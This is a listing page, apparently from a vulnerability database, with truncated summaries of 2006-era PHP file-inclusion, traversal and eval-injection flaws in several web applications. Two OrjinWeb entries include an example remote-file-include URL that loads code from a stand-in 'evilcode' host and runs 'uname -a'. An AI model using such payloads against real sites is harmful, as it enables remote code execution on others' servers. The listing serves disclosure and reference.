CVE-2006-0659

CVE-2006-0659 concerns multiple PHP remote code execution vulnerabilities in RunCMS 1.2 and earlier, arising when register_globals and allow_url_fopen are enabled. An attacker can trigger arbitrary code execution via the bbPath[path] parameter in (1) class.forumposts.php and (2) forumpollrenderer...

LinPHA 0.9.x1.0 - forth_stage_install.php Local File Inclusion

LinPHA 0.9.x1.0 - forthstageinstall.php Local File Inclusion source: https://www.securityfocus.com/bid/16592/info LinPHA is prone to multiple local file-inclusion and PHP code-injection vulnerabilities. The local file-inclusion issues are due to insecure use of the 'includeonce' PHP function in...

Farsinews 2.12.5 - show_archives.php?template Traversal Arbitrary File Access

Farsinews 2.12.5 - showarchives.php?template Traversal Arbitrary File Access source: https://www.securityfocus.com/bid/16580/info FarsiNews is prone to directory-traversal and local file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-suppli...

Farsinews 2.1/2.5 - 'show_archives.php?template' Traversal Arbitrary File Access

source: https://www.securityfocus.com/bid/16580/info FarsiNews is prone to directory-traversal and local file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit the directory-traversal vulnerability to...

CVE-2006-0565

CVE-2006-0565 affects Loudblog 0.4 and earlier. The vulnerability is a PHP remote file include in inc/backend_settings.php that allows an attacker to execute arbitrary PHP code via a URL supplied to the $GLOBALS[path] parameter. The NVD entries describe that remote code execution is possible, wit...

Code injection

Unspecified vulnerability in index.php in a certain application available from /v1/tr/portfoy.php on www.egeinternet.com allows remote attackers to execute arbitrary code via "evilcode" in the key parameter, possibly a PHP remote file include vulnerability in which the attack vector is a URL in t...

CVE-2003-1292

CVE-2003-1292 concerns ashNews 0.83. The vulnerability is a PHP remote file inclusion (RFI) where an attacker can use a URL in the pathtoashnews parameter to ashnews.php and ashheadlines.php to include and execute remote files. Affected software: ashNews 0.83. The CVSS details from NVD indicate a...

PmWiki 2.1 - Multiple Input Validation Vulnerabilities

PmWiki 2.1 - Multiple Input Validation Vulnerabilities source: https://www.securityfocus.com/bid/16421/info PmWiki is prone to multiple input-validation vulnerabilities. These issues are due to failures in the application to properly sanitize user-supplied input. - Arbitrary remote file-include...

PmWiki 2.1 - Multiple Input Validation Vulnerabilities

source: https://www.securityfocus.com/bid/16421/info PmWiki is prone to multiple input-validation vulnerabilities. These issues are due to failures in the application to properly sanitize user-supplied input. - Arbitrary remote file-include vulnerability. Exploitation of this issue will result in...

Design/Logic Flaw

Eval injection vulnerability in ezDatabase 2.0 and earlier allows remote attackers to execute arbitrary PHP code via the dbid parameter to visitorupload.php, as demonstrated using phpinfo and include function calls...

CVE-2006-0214

Eval injection vulnerability in ezDatabase 2.0 and earlier allows remote attackers to execute arbitrary PHP code via the dbid parameter to visitorupload.php, as demonstrated using phpinfo and include function calls...

CVE-2006-0171

PHP remote file include vulnerability in index.php in OrjinWeb E-commerce allows remote attackers to execute arbitrary code via a URL in the page parameter. NOTE: it is not clear, but OrjinWeb might be an application service, in which case it should not be included in CVE...

CVE-2006-0171

PHP remote file include vulnerability in index.php in OrjinWeb E-commerce allows remote attackers to execute arbitrary code via a URL in the page parameter. NOTE: it is not clear, but OrjinWeb might be an application service, in which case it should not be included in CVE...

orjinweb.txt

Orjinweb E-commerce Remote File Include Vulnerability http://www.targetsite.com/?page=http://evilcode.txt?&cmd=uname -a...

Orjinweb E-commerce

Orjinweb E-commerce Remote File Include Vulnerability http://www.targetsite.com/?page=http://evilcode.txt?&cmd=uname -a...

Remote file include in appserv 2.4.5 (possible in previous versions)

====================================================================== Remote file include in appserv 2.4.5 possible in previous versions ====================================================================== What is Appserv AppServ is the Apache/PHP/MySQL open source software installer packages...

CVE-2006-0099

CVE-2006-0099 is a PHP remote file include vulnerability in Valdersoft Shopping Cart 3.0. The flaw occurs in (1) include/templates/categories/default.php and (2) other include/templates/categories/ PHP scripts, where an attacker can cause arbitrary code execution by supplying a crafted URL in the...

EUVD-2006-0107

PHP remote file include vulnerability in 1 include/templates/categories/default.php and 2 certain other include/templates/categories/ PHP scripts in Valdersoft Shopping Cart 3.0 allows remote attackers to execute arbitrary code via a URL in the catalogDocumentRoot parameter...

Design/Logic Flaw

PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the incstat parameter, a different vulnerability than CVE-2006-0076. NOTE: the provenance of this information is unknown; the details are obtained solely from third...

CVE-2006-0094

PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the incstat parameter, a different vulnerability than CVE-2006-0076. NOTE: the provenance of this information is unknown; the details are obtained solely from third...